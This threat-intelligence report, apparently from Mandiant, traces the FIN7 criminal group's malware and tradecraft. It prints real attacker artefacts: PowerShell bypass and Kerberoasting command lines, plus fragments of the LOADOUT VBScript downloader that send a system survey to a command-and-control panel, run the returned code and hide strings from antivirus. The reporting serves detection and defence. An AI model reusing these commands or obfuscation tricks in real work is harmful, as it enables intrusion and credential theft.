LOADOUT is an obfuscated VBScript-based downloader which harvests extensive information from the infected system. The harvested information is then sent to a command-and-control (C2) server. C2 server responses for LOADOUT infections delivered GRIFFON, a JavaScript-based downloader which retrieves additional JavaScript modules using HTTP or DNS and executes them in memory.
In late summer of 2020, FIN7 capped off their busy year with the first observed usage of POWERPLANT. POWERPLANT, also referred to as “KillACK”, is a PowerShell-based backdoor with a breadth of capabilities, initially delivered following a successful GRIFFON infection in August 2020. Merges involving the usage of POWERPLANT into 2021 led us to assess that FIN7 is likely the only operator using POWERPLANT.
2021 Activity Brief: A Shift to POWERPLANT
We identified an uptick in FIN7-suspected UNC group activity during 2021 across five intrusions, beginning in April of 2021. The uptick led us to initiate a deep-dive research effort into FIN7. We also observed FIN7 shift their initial access techniques away from using LOADOUT, GRIFFON or CARBANAK in favor of direct deployment of POWERPLANT and BEACON. Specifically, FIN7 used POWERPLANT in all observed intrusions in 2021. FIN7 also relied on BEACON as a secondary mode of access alongside some POWERPLANT infections.
Throughout 2021 we scrutinized a multitude of FIN7-linked UNC groups to our breadth of past FIN7 intelligence holdings, merging multiple threat clusters along the way. Our research revealed a fusion of older FIN7 intrusion tradecraft, and new FIN7 malware.
PowerShell Archaeology: FIN7 Habits Die Hard
There is no doubt about it, PowerShell is FIN7’s love language. FIN7 has implemented malware into its offensive operations using many programming languages; however, during on-system interactions, FIN7’s preference for boutique PowerShell-based loaders and unique PowerShell commands is dominant.
Our deep dive into prior FIN7 intrusions dating as far back as 2019 bubbled up several long-standing patterns of unique PowerShell invocations still being used today. In the first example, command lines, such as in Figure 2 and Figure 3, had overall low-global prevalence outside of FIN7 and suspected FIN7 UNCs.
cmd.exe /c start %SYSTEMROOT%system32WindowsPowerShellv1.0powershell.exe -noni
-nop -exe bypass -f <REDACTED>/ADMIN$/temp/wO9EBGmDqwdc.ps1Figure 2: FIN7 PowerShell Execution from 2019
cmd.exe /c start %SYSTEMROOT%system32WindowsPowerShellv1.0powershell.exe -noni
-nop -exe bypass -f <REDACTED>Admin$c5k3fsys.3bp.ps1
Figure 3: FIN7 PowerShell Execution from 2021
The unique aspect in the Figure 2 and Figure 3 commands is the distinct parameters -noni -nop -exe bypass -f, for launching scripts located in Admin shares and installing Windows services. Since 2019, we have observed FIN7 use command line parameters such as these while interacting with victim systems through backdoor malware such as CARBANAK. We have since seen a shift of some of these distinct PowerShell commands being initiated through POWERPLANT infections.
Smaller patterns and consistencies across FIN7 intrusions from 2019 and beyond reveal more distinct PowerShell command lines using -ex bypass -f or -ex bypass -fileas passed parameters. Although those patterns appear modest to hunt for, the combinations have extremely low global prevalence outside of FIN7-associated threat activity. For example, the first command line pattern has been seen over 2800 times, all of which were events attributed to FIN7. The second command line pattern has been seen nearly 250 separate times at 10 different victims as far back as 2019, all of which were FIN7 attributed commands.
powershell.exe -ex bypass -file C:windowstempfdddu32.ps1Figure 4: FIN7 PowerShell Execution from 2019
powershell.exe -ex bypass -f c:userspublictempAC-Win10w-x64.ps1
powershell.exe -ex bypass -f C:UsersPublicVideosAC-Bot-x64.ps1Figure 5: FIN7 PowerShell Execution from 2020
powershell.exe -ex bypass -f pkit.ps1
powershell.exe -ex bypass -f cube.ps1Figure 6: FIN7 PowerShell Executions from 2021
In addition to FIN7’s unique command lines during intrusion operations, we identified long-standing usage of other PowerShell code families, such as POWERTRASH. POWERTRASH is an in-memory dropper, or loader, written in PowerShell that executes an embedded payload. Observed payloads loaded by FIN7’s POWERTRASH include CARBANAK, DICELOADER, SUPERSOFT, BEACON and PILLOWMINT. POWERTRASH is a uniquely obfuscated iteration of a shellcode invoker included in the PowerSploit framework available on GitHub.
With this improved understanding of FIN7 intrusion operations, we assembled our analytical efforts to begin merging multiple suspected UNCs into FIN7. As part of this initiative, we identified new FIN7 missions targeting our customers, including a Managed Defense Rapid Response engagement in 2021.
Managing a Defense
FIN7 has targeted a broad spectrum of organizations in multiple industries, including Software, Consulting, Financial Services, Medical Equipment, Cloud Services, Media, Food and Beverage, Transportation, and Utilities. We identified over a dozen intrusions attributed to FIN7 since 2020 across our client base. The following use case profiles recent FIN7 tradecraft during a Mandiant Managed Defense engagement in 2021.
FIN7 From the Trenches
To obtain initial access during this intrusion, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server across two separate days, and initiated two similar Windows process chains (Figure 7).
rdpinit.exe
↳ notepad++.exe
↳ cmd.exe
↳ powershell.exe
rdpinit.exe
↳ notepad++.exe
↳ cmd.exe
↳ rundll32.exeFigure 7: Two FIN7 process event chains
FIN7 used established RDP access to eventually install other modes of host control, first by executing PowerShell reconnaissance scripts, then by executing a TERMITE loader (Figure 8).
RunDll32 TstDll.dll,TstSec 11985756 Figure 8: Command line used to load FIN7 TERMITE
TERMITE is a password-protected shellcode loader which we have observed at least seven distinct threat groups use to load BEACON, METASPLOIT, and BUGHATCH shellcodes. FIN7 used TERMITE to load and execute a shellcode stager for Cobalt Strike BEACON in this case.
Following secondary access of BEACON, FIN7 began further enumeration using built-in Windows commands as well as POWERSPLOIT and Kerberoasting PowerShell modules.
cmd.exe /C net group "Domain Admins" /domain
cmd.exe /C quser
powershell.exe -c import-module C:UsersPublickerberoast_hex.ps1; Invoke-Kerberoast -OutputFormat HashCat > hash.txt
powershell.exe -ex bypass -c import-module C:UsersPublickerberoast_hex.ps1; Invoke-Kerberoast -OutputFormat HashCat
powershell.exe -ex bypass -f pkit.ps1After the initial reconnaissance using RDP and BEACON, FIN7 executed an obfuscated loader for a victim-customized variant of the PowerShell-based backdoor POWERPLANT, providing tertiary access:
powershell.exe -ex bypass -f cube.ps1FIN7 then attempted to steal credentials and further compromise the victims’ environment with limited success, as the client was able to respond and quickly remediate with the advantage of Managed Defense responders.
A unique aspect of this specific intrusion perfectly highlighted the challenges of technical attribution for cybercriminal threats: Between the two days of FIN7 operations on the victim system, FIN12 was also active on the same victim for multiple hours using the same RDP account, but much different infrastructure and tradecraft, attempting to install BEACON using the WEIRDLOOP in-memory dropper before the intrusion was remediated.
FIN7’s Evasion
Among FIN7’s historical trademarks were their creative obfuscation and fast development of evasive techniques. This is still the case, with FIN7 first stage droppers and downloaders being heavily obfuscated. LOADOUT in particular, due to its wide distribution in opportunistic campaigns, has been through several iterations meant to improve evasion.
The initial obfuscation mechanism was basic but effective at evading static detections: the malicious code was interspersed with random junk code (Figure 9). After a few months of successful campaigning, AV detection engines improved coverage of the downloader. To get around this, and to send a message, LOADOUT developer(s) broke up the beacon suspected to be used in detection signatures by simply inserting “FUCKAV” into the strings (Figure 8).
data = "id=" & get_id() & "&FUCKAVtype=put" & get_computer_info("") & "&DomainHosts=" & count_domain_hosts() & "&UserName=" & usFUCKAVername & "&LogicalDrives=" & get_grivers() & "&SystemInfo=nothing&SoftwareInfo=nothing&NetworkInfo=nothingFUCKAV&ProcessList=" & get_processlist() & "&DesktopFileList=" & get_desktopfiles() & "&DesktopScreenshFUCKAVot=nothing&WebHistory=nothing&stype=vbs"
response = send(panel_url, data)
if response = "okFUCKAV" then
js = send(panel_url, "")
run_js(js)
end ifFUCKAVFigure 8: System survey information sent as beacon by LOADOUT
kiki=ado.ReadText
' OE5QAJ2VaFCK F5
Dim yiups
yiups = "UTo"
WScript.Echo(" error ")
kok = replace(kiki, "FUCKAV", "")
ulpo = "12"
aoso = year("01/07/12")
if right(aoso, 2) = ulpo then
execute("WScript.Echo("" file is corrupted ""):" & kok)
end if
'hello bitchwFigure 9: LOADOUT obfuscation
Indeed, the developer(s) was correct to be suspicious that these strings were being used for detection. By pivoting on the beacon, we discovered a new, work-in-progress variant of LOADOUT submitted to VirusTotal (MD5: 485b2a920f3b5ae7cfad93a4120ec20d), detected by only one engine (Figure 10). Two hours later, a new version was submitted (MD5: 012e7b4d6b5cb8d46771852c66c71d6d), this time with the offending PowerShell command obscured through their custom obfuscation mechanism (Figure 11).
objTS.WriteLine(TextCrypt)
objTS.Close
pwsh_command = "powershell.exe -executionpolicy bypass -file " & FileName & ".ps1"
objWSH.Run pwsh_command, 0, True
FSO.DeleteFile FileName & ".ps1"Figure 10: PowerShell command before obfuscation
Text1 = "/3/3.1/2.1,7/2/2.0/3+4+5/4/2*3,7.0,7/2/2.1/4.0,6/3/3.0/3.0+5/4+5-9/4.1+5/4/3*3,7.0,6/3/2*3272327272412292326241618252310112117262125222518252429242516
261416272214202710112212232310"
TextCrypt = Encryption(MakeCryptoText(TextUnShifter(Text1)), False)
pwsh_command = TextCrypt & FileName & ".ps1"
objWSH.Run pwsh_command, 0, True
FSO.DeleteFile FileName & ".ps1"Figure 11: PowerShell command obfuscation
FIN7 actors have historically tested their tools against public repositories to check static detection engine coverage. It is likely that in this case, they were testing the strength of their custom obfuscation.
This new and improved version of LOADOUT emerged five months later. It was refactored to add multiple layers of obfuscation, including interspersed Bible verses as filler text, and string obfuscation through a custom mechanism (Figure 12).
Private Function GetShiftKey()
On Error Resume Next
Set Key = CreateObject("Scripting.Dictionary")
l = Len(CryptoKey
i1 = 0
With Key
For i = 1 To l
s = Mid(CryptoKey, i, 1)
n = (Asc(s) Mod 8) + 1
If Not .Exists(n) Then
.Add n, n
i1 = i1 + 1
End If
If i1 = 9 Then Exit For
Next
If i >= l And i1 < 9 Then
For i = 1 + 1 To 8
If Not .Exists(i) Then
.Add i, i
End If
Next
End If
For i = 1 To 8
GetShiftKey = GetShiftKey + .Items()(i)
Next
End With
End Function
Private Function TextShifter(txt)
Dim nKeys(), out()
Key = GetShiftKey
n = Len(Key)
If n = 0 Then Exit Function
l = Len(txt)
m = -Int(-l / n)
ReDim nKeys(n)
For i = 1 To n
s1 = Mid(Key, i, 1)
For j = 1 To n
s2 = Mid(Key, j, 1)
If s1 > s2 Or (s1 = s2 And j <= i) Then
nKeys(i) = nKeys(i) + 1
End If
Next
Next
ReDim out(n * m)
For i = 1 To Len(txt)
out(nKeys((i - 1) Mod n + 1) * m + (i - 1) n - m + 1) = Mid(txt, i, 1)
Next
TextShifter = Join(out, "")
End FunctionFigure 12: LOADOUT custom string obfuscation
POWERPLANT: FIN7’s PowerShell Workhorse
FIN7 has leveraged multiple methods of initial and secondary access into victim networks including phishing, compromising third-party systems, Atera agent installers, GoToAssist, and RDP. In a recent case, FIN7 actors compromised a website that sells digital products and modified multiple download links to point to an Amazon S3 bucket hosting trojanized versions, containing an Atera agent installer. This remote management tool was later used to deploy POWERPLANT to the victim system. This was the first time Mandiant observed FIN7 leverage supply chain compromise. FIN7’s time-tested CARBANAK and DICELOADER (also known as Lizar) malware continue to be in use; however, we have noticed FIN7 depend more on the POWERPLANT backdoor during recent intrusions.
Our research into POWERPLANT has revealed that it is a vast backdoor framework with a breadth of capabilities, depending on which modules are delivered from the C2 server. POWERPLANT backdoors contain internal version identifiers within the code. We have identified samples ranging from version “0.012” through “0.028”, with examples shown in Table 1.
|
POWERPLANT Sample MD5 |
Version |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Table 1: POWERPLANT samples
The rate of increase in these internal version numbers over time suggests that FIN7 is actively developing POWERPLANT (Figure 13). In one engagement, we observed FIN7 deploy incremented versions of POWERPLANT with tweaked functionality to targets in the middle of intrusion operations. During that engagement, versions “0.023” and “0.025” were both used within a 10-minute timeframe. Each version we have identified implements overall similar functionality with some programmatic improvements and features added over time.
Source: https://www.mandiant.com/resources/evolution-of-fin7